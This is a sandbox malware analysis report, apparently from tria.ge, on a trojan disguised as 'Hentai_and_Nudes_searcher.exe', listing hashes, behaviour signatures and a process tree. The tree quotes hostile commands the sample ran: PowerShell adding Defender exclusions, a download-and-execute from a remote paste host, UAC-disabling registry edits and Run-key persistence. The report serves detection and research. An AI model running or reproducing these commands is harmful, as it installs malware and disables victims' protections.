Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
42s -
max time network
47s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
02/10/2024, 12:01
Static task
static1
General
-
Target
Hentai_and_Nudes_searcher.exe
-
Size
437KB
-
MD5
70e761e3048bc3b921ab2313199fd74f
-
SHA1
1be4deee7db5645d1e42c8e0583d3f67d5907066
-
SHA256
8f244860702e6ec3d0de412de629e827bff49b641e59d71557ff3559e60c59f4
-
SHA512
a6ca91827a3ead93b473beb380b4f757bf6140e05022a601e84362b47d46078cb14231261f6953aa5ebe7024f7fc2b8cf617b2d4f31149273da945893c85bf83
-
SSDEEP
12288:Jl8/sjCS8Oajo23qfmk56LBdwYPfYW7CjKmPvsnxC8fE85M16YTTKEmCj5iZSazW:EVYXKgij
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" powershell.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 2 4628 powershell.exe 3 4628 powershell.exe 5 4628 powershell.exe 6 4628 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4944 powershell.exe 1316 powershell.exe 4628 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
pid Process 1164 Updates.exe 3880 nds.exe 2456 chromedrivers.exe 3224 chromedrivers.exe -
resource yara_rule behavioral1/files/0x000c00000002aa8a-102.dat vmprotect behavioral1/memory/1164-109-0x000002349D2D0000-0x000002349D31C000-memory.dmp vmprotect behavioral1/files/0x000100000002aac2-133.dat vmprotect behavioral1/memory/2456-140-0x0000000000A00000-0x0000000001A44000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Software\Microsoft\Windows\CurrentVersion\Run\Updates = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe" Updates.exe Set value (str) \REGISTRY\USER\S-1-5-21-970747758-134341002-3585657277-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Updates = "C:\\Users\\Admin\\AppData\\Local\\Updates.exe" Updates.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 16 discord.com 1 discord.com 9 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ipecho.net 7 ipecho.net -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Hentai_and_Nudes_searcher.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chromedrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chromedrivers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe -
Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1688 wmic.exe 3220 wmic.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4944 powershell.exe 4944 powershell.exe 1316 powershell.exe 1316 powershell.exe 4628 powershell.exe 4628 powershell.exe 1164 Updates.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4944 powershell.exe Token: SeDebugPrivilege 1316 powershell.exe Token: SeDebugPrivilege 4628 powershell.exe Token: SeDebugPrivilege 1164 Updates.exe Token: SeDebugPrivilege 4660 Hentai_and_Nudes_searcher.exe Token: SeDebugPrivilege 3880 nds.exe Token: SeIncreaseQuotaPrivilege 4996 wmic.exe Token: SeSecurityPrivilege 4996 wmic.exe Token: SeTakeOwnershipPrivilege 4996 wmic.exe Token: SeLoadDriverPrivilege 4996 wmic.exe Token: SeSystemProfilePrivilege 4996 wmic.exe Token: SeSystemtimePrivilege 4996 wmic.exe Token: SeProfSingleProcessPrivilege 4996 wmic.exe Token: SeIncBasePriorityPrivilege 4996 wmic.exe Token: SeCreatePagefilePrivilege 4996 wmic.exe Token: SeBackupPrivilege 4996 wmic.exe Token: SeRestorePrivilege 4996 wmic.exe Token: SeShutdownPrivilege 4996 wmic.exe Token: SeDebugPrivilege 4996 wmic.exe Token: SeSystemEnvironmentPrivilege 4996 wmic.exe Token: SeRemoteShutdownPrivilege 4996 wmic.exe Token: SeUndockPrivilege 4996 wmic.exe Token: SeManageVolumePrivilege 4996 wmic.exe Token: 33 4996 wmic.exe Token: 34 4996 wmic.exe Token: 35 4996 wmic.exe Token: 36 4996 wmic.exe Token: SeIncreaseQuotaPrivilege 4996 wmic.exe Token: SeSecurityPrivilege 4996 wmic.exe Token: SeTakeOwnershipPrivilege 4996 wmic.exe Token: SeLoadDriverPrivilege 4996 wmic.exe Token: SeSystemProfilePrivilege 4996 wmic.exe Token: SeSystemtimePrivilege 4996 wmic.exe Token: SeProfSingleProcessPrivilege 4996 wmic.exe Token: SeIncBasePriorityPrivilege 4996 wmic.exe Token: SeCreatePagefilePrivilege 4996 wmic.exe Token: SeBackupPrivilege 4996 wmic.exe Token: SeRestorePrivilege 4996 wmic.exe Token: SeShutdownPrivilege 4996 wmic.exe Token: SeDebugPrivilege 4996 wmic.exe Token: SeSystemEnvironmentPrivilege 4996 wmic.exe Token: SeRemoteShutdownPrivilege 4996 wmic.exe Token: SeUndockPrivilege 4996 wmic.exe Token: SeManageVolumePrivilege 4996 wmic.exe Token: 33 4996 wmic.exe Token: 34 4996 wmic.exe Token: 35 4996 wmic.exe Token: 36 4996 wmic.exe Token: SeIncreaseQuotaPrivilege 1688 wmic.exe Token: SeSecurityPrivilege 1688 wmic.exe Token: SeTakeOwnershipPrivilege 1688 wmic.exe Token: SeLoadDriverPrivilege 1688 wmic.exe Token: SeSystemProfilePrivilege 1688 wmic.exe Token: SeSystemtimePrivilege 1688 wmic.exe Token: SeProfSingleProcessPrivilege 1688 wmic.exe Token: SeIncBasePriorityPrivilege 1688 wmic.exe Token: SeCreatePagefilePrivilege 1688 wmic.exe Token: SeBackupPrivilege 1688 wmic.exe Token: SeRestorePrivilege 1688 wmic.exe Token: SeShutdownPrivilege 1688 wmic.exe Token: SeDebugPrivilege 1688 wmic.exe Token: SeSystemEnvironmentPrivilege 1688 wmic.exe Token: SeRemoteShutdownPrivilege 1688 wmic.exe Token: SeUndockPrivilege 1688 wmic.exe -
Suspicious use of WriteProcessMemory 38 IoCs
description pid Process procid_target PID 4660 wrote to memory of 1240 4660 Hentai_and_Nudes_searcher.exe 80 PID 4660 wrote to memory of 1240 4660 Hentai_and_Nudes_searcher.exe 80 PID 4660 wrote to memory of 1240 4660 Hentai_and_Nudes_searcher.exe 80 PID 1240 wrote to memory of 852 1240 net.exe 82 PID 1240 wrote to memory of 852 1240 net.exe 82 PID 1240 wrote to memory of 852 1240 net.exe 82 PID 4660 wrote to memory of 4944 4660 Hentai_and_Nudes_searcher.exe 83 PID 4660 wrote to memory of 4944 4660 Hentai_and_Nudes_searcher.exe 83 PID 4660 wrote to memory of 4944 4660 Hentai_and_Nudes_searcher.exe 83 PID 4660 wrote to memory of 1316 4660 Hentai_and_Nudes_searcher.exe 85 PID 4660 wrote to memory of 1316 4660 Hentai_and_Nudes_searcher.exe 85 PID 4660 wrote to memory of 1316 4660 Hentai_and_Nudes_searcher.exe 85 PID 4660 wrote to memory of 4628 4660 Hentai_and_Nudes_searcher.exe 87 PID 4660 wrote to memory of 4628 4660 Hentai_and_Nudes_searcher.exe 87 PID 4660 wrote to memory of 4628 4660 Hentai_and_Nudes_searcher.exe 87 PID 4628 wrote to memory of 1164 4628 powershell.exe 89 PID 4628 wrote to memory of 1164 4628 powershell.exe 89 PID 4628 wrote to memory of 3880 4628 powershell.exe 90 PID 4628 wrote to memory of 3880 4628 powershell.exe 90 PID 4628 wrote to memory of 3880 4628 powershell.exe 90 PID 1164 wrote to memory of 2456 1164 Updates.exe 91 PID 1164 wrote to memory of 2456 1164 Updates.exe 91 PID 1164 wrote to memory of 2456 1164 Updates.exe 91 PID 2456 wrote to memory of 4996 2456 chromedrivers.exe 92 PID 2456 wrote to memory of 4996 2456 chromedrivers.exe 92 PID 2456 wrote to memory of 4996 2456 chromedrivers.exe 92 PID 2456 wrote to memory of 1688 2456 chromedrivers.exe 95 PID 2456 wrote to memory of 1688 2456 chromedrivers.exe 95 PID 2456 wrote to memory of 1688 2456 chromedrivers.exe 95 PID 2456 wrote to memory of 3224 2456 chromedrivers.exe 97 PID 2456 wrote to memory of 3224 2456 chromedrivers.exe 97 PID 2456 wrote to memory of 3224 2456 chromedrivers.exe 97 PID 3224 wrote to memory of 4920 3224 chromedrivers.exe 98 PID 3224 wrote to memory of 4920 3224 chromedrivers.exe 98 PID 3224 wrote to memory of 4920 3224 chromedrivers.exe 98 PID 3224 wrote to memory of 3220 3224 chromedrivers.exe 100 PID 3224 wrote to memory of 3220 3224 chromedrivers.exe 100 PID 3224 wrote to memory of 3220 3224 chromedrivers.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\Hentai_and_Nudes_searcher.exe"C:\Users\Admin\AppData\Local\Temp\Hentai_and_Nudes_searcher.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Windows\SysWOW64\net.exe"net" session2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 session3⤵
- System Location Discovery: System Language Discovery
PID:852
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionProcess \"powershell.exe\""2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath \"C:\Windows\System32\WindowsPowerShell\v1.0\\""2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ExecutionPolicy Bypass -Command "Invoke-Expression(Invoke-WebRequest -Uri \"http://pastebinlol.serv00.net/pastes/somepower14.txt\").Content"2⤵
- UAC bypass
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Users\Admin\AppData\Local\Updates.exe"C:\Users\Admin\AppData\Local\Updates.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Users\Admin\AppData\Local\chromedrivers.exe"C:\Users\Admin\AppData\Local\chromedrivers.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get uuid5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name5⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Users\Admin\AppData\Local\chromedrivers.exe"C:\Users\Admin\AppData\Local\chromedrivers.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" csproduct get uuid6⤵
- System Location Discovery: System Language Discovery
PID:4920
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get name6⤵
- System Location Discovery: System Language Discovery
- Detects videocard installed
PID:3220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nds.exe"C:\Users\Admin\AppData\Local\Temp\nds.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3880
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
Filesize
18KB
MD52e9e5c1b0ec6b52883a21f03e6ca1b2e
SHA1c8a911afb0a6a0dedb8e670afb2c5cea7bd666e8
SHA2560dfa680a59128dc0b270626ea427a4e41684da075e573916f3b2670fa878a91d
SHA5124ff62072925884305b4e3c03a57501f9038351d2b56dfca737df10ed924aa4fc2a8a07570908cf67db95ba0d6e0cdb3b45d9d8a03f036de68e1376b532654a97
-
Filesize
18KB
MD59ec70c93e5ae911a9ba6cb4aaf598323
SHA150bce84ce7492e27395df07588b1fd94f5cc3675
SHA256ae5e2fe13fe7b8ab738ccdafdc18409045423da2503b852cf7c1d6f23e4c6f47
SHA51251cf96ebd7d79e6bbd6d40c4f4ac19d389e27074c947c32a889faa5773723764ac9b9e03d135af7baf87cc82ba05584bcaad4489ab070379b657aa6b26e3d4c6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
439KB
MD5ea3e56db72a8f96003a188e664621fae
SHA120e228520187983faf42c94d2a8de448c1878221
SHA25689f59a737962ce32482dd6f733d19a780031b469b5cd21a3bddea6426258aa5f
SHA512ad90d569c6e72528f8b18442c3edd75e9fad4110e08e5b32e4f3ef7f570e6eccf4d6e1da95e05d9323296e4e8c208ed2c08f38f9292b6477028873df1ac9bc93
-
Filesize
254KB
MD550df586c92d6ceb442599d20e015b357
SHA11d2071089bdc091d06fb1bb4e458cf7ca3dd1276
SHA2564e435463689beff07ef6b17b8d6559d68a1f21e62bf652cc28cc6d6535da4310
SHA512cb0dbe51fee3f15227234470c53fd61b848a7177a31929ec1b5275f9bb7528e87370433c8113f0352af62250e121e5d5e08dc15b67d9126976d5e12744c5953f
-
Filesize
10.8MB
MD571e905772d3d65b1c93e25fd03c88235
SHA10edea1290d45e427cd7be43abfab11d085a5c2e3
SHA2569526227a851d1ce70a2a444c4c7ee7de2c5bf6206a42decaad8d65c3ff0b61d9
SHA51271af02434d64350218cec31dd13eb7baa285411d74707d29aa114033e996bfb6dc81b19eec89dd21f1103b798ded83cd089adeb690fbc48fdf62cbce3b91d924